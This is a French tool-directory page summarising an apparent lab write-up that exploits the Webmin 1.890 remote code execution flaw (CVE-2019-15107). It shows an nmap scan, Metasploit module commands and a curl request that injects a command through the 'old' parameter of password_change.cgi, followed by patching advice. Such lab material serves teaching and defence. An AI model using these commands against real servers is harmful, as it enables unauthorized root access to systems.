Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Project-Exploitation-of-Webmin-Authentication-Vulnerability — Objectif de recherche : Mener une analyse complète et une exploitation réussie d'une vulnérabilité d'exécution de code à distance (RCE) dans Webmin version 1.890 (CVE-2019-15107), afin d'obtenir le contrôle total du système cible. | Kitploit
Outils/GitHubGitHub/artemcyberlab/project-exploitation-of-webmin-authentication-vulnerability
Analyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubartemcyberlab/project-exploitation-of-webmin-authentication-vulnerability

Project-Exploitation-of-Webmin-Authentication-Vulnerability

Objectif de recherche : Mener une analyse complète et une exploitation réussie d'une vulnérabilité d'exécution de code à distance (RCE) dans Webmin version 1.890 (CVE-2019-15107), afin d'obtenir le contrôle total du système cible.

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Objectif de la recherche : Effectuer une analyse complète et une exploitation réussie d'une vulnérabilité d'exécution de code à distance (RCE) dans Webmin version 1.890 (CVE-2019-15107), en obtenant finalement le contrôle total du système cible.

Méthodologie :

Reconnaissance initiale :

Scan réseau effectué avec Nmap :

root@kitploit:~
nmap -sV -sC -A -p- 10.201.105.185

Service Webmin 1.890 identifié sur le port 10000

Analyse de la vulnérabilité :

Examen du mécanisme de la vulnérabilité dans password_change.cgi

Confirmation de la possibilité d'exécution de commandes arbitraires sans authentification

Exploitation :

Mise en œuvre de deux vecteurs d'attaque :

Utilisation du framework Metasploit :

root@kitploit:~
use exploit/linux/http/webmin_backdoor
set RHOSTS 10.201.105.185
set LHOST tun0
exploit

Exploitation manuelle via curl :

root@kitploit:~
curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"

Post-exploitation :

Obtention d'un shell root interactif

Analyse du système de fichiers effectuée

Fichiers flag découverts :

root@kitploit:~
/home/dark/user.txt
/root/root.txt

Résultats :

Vulnérabilité CVE-2019-15107 exploitée avec succès

Obtention des privilèges root complets sur le système

Démontré l'importance cruciale des mises à jour logicielles en temps opportun

Conclusions techniques :

La vulnérabilité permet l'exécution de commandes arbitraires via l'injection du paramètre 'old'

L'absence de contrôles d'authentification rend cela particulièrement dangereux

La version 1.890 contient une porte dérobée corrigée dans les versions ultérieures

Recommandations de sécurité :

Mise à niveau immédiate vers la version actuelle de Webmin

Restreindre l'accès au panneau d'administration par IP

Audits de sécurité réguliers des applications web

Orientations de recherche supplémentaires :

Analyse d'autres vulnérabilités de Webmin

Développement d'un exploit personnalisé sans Metasploit

Investigation des techniques de persistance dans les systèmes compromis

Cette étude de cas démontre l'importance cruciale des mises à jour système en temps opportun et la nécessité d'une surveillance continue des vulnérabilités dans les logiciels déployés. La recherche fournit des éclairages pratiques sur les techniques modernes d'exploitation des applications web tout en mettant l'accent sur les principes fondamentaux de sécurité.

Télécharger l’outil